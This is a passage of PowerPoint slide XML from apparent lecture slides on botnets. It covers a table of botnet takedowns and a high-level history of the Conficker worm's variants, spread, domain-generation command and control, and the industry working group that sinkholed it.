                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3689205151"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Gameover</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> Zeus/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Cryptolocker</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2012-2014</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>DoJ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>, FBI, Europol, Dell, Microsoft, Level3, McAfee, Symantec, Sophos, Trend Micro, Carnegie Mellon, Georgia Tech, etc.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3641075361"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>SIMDA</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2011-2015</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>770K</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>INTERPOL, Trend Micro, Microsoft, Kaspersky Lab</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="419908957"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>DRIDEX</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2014-2015</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FBI, Trend Micro</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3235441752"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Avalanche</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2009-2016</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>500K</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FBI, Symantec, Fraunhofer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2899704671"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3363DDCA-CB14-442D-AB5C-EB351D3DD1E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429370" y="3323645"/>
            <a:ext cx="11266999" cy="588397"/>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76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FBF58-87A0-473C-A325-DE5FEA2C5170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7837DC69-D7BC-4040-BB39-D4E412600139}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4924496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the largest and most virulent botnets ever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Launched in 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monetization: unknown. Possibly PPI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Five different variants observed over time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size estimates vary widely, from 4-13 million</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat was so grave that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Working Group was formed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Led by Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dedicated to eradicating the botnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5425149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888E5-6698-44A0-BFB8-2891A7FA3062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Propagation and Self-Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CF52146-571D-499C-B8E8-A2E479C343EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>November 2008: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Targets a remote buffer overflow in Windows Remote Procedure Call (RPC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Self-propagating worm: attacks more machines after infection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Emerged one week after the vulnerability was disclosed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>December 2008: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cracks shared network drives with weak passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infects removable drives like USB keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anti-debugging features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disables popular anti-virus software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>March 2009: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blocks DNS requests to Microsoft and anti-virus companies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disables safe-mode, Windows update, and deletes restore points</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26158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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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9" end="9"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40"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10" end="10"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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6" dur="5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74D89-60EA-4652-B68E-1040E733A836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE068E32-0CD3-4C1F-9A2A-23540CF17A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2856" y="1418224"/>
            <a:ext cx="10416379" cy="5245510"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2310481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4991D-DD6A-4AA9-BEB1-D3F5065FF826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command and Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32971E7E-CEC8-4DC9-AAAA-4F3CABBF82CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generates 250 domain names each day over 5 TLDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connects to the domains in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>random order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whitehats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from just registering the first domain each day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generates 250 domain names each day over 8 TLDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generates 500-50K domain names each day over 116 TLDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P2P layer that connects to other infected hosts on the local area network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141662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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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6" end="6"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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7771-6DA2-4919-B57C-BD51B8E2DE11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Working Group (CFW)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5E3C881-860F-4A69-93B0-FED7631200D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Led by Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You know, because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FBI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security researchers: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shadowserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Symantec, Georgia Tech</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various DNS registry operators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verisign, Neustar, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Afilias</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (.com, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, .org, .info, .biz)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most importantly: ICANN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control IP address allocations and the DNS root zones</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D683E801-3FA7-4F17-B725-C53610171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9892" y="4079971"/>
            <a:ext cx="2975212" cy="2368269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347473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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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60098-ABAC-4382-9191-D42641850BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Taking Down </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37C5B70B-43BE-446B-91C6-863894D5586D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="4934771"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recall that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> uses DGA for rendezvous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>250 domain * 8 TLDs per day for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> A/B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To sinkhole </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Conficker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the CFW must register all DGA domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
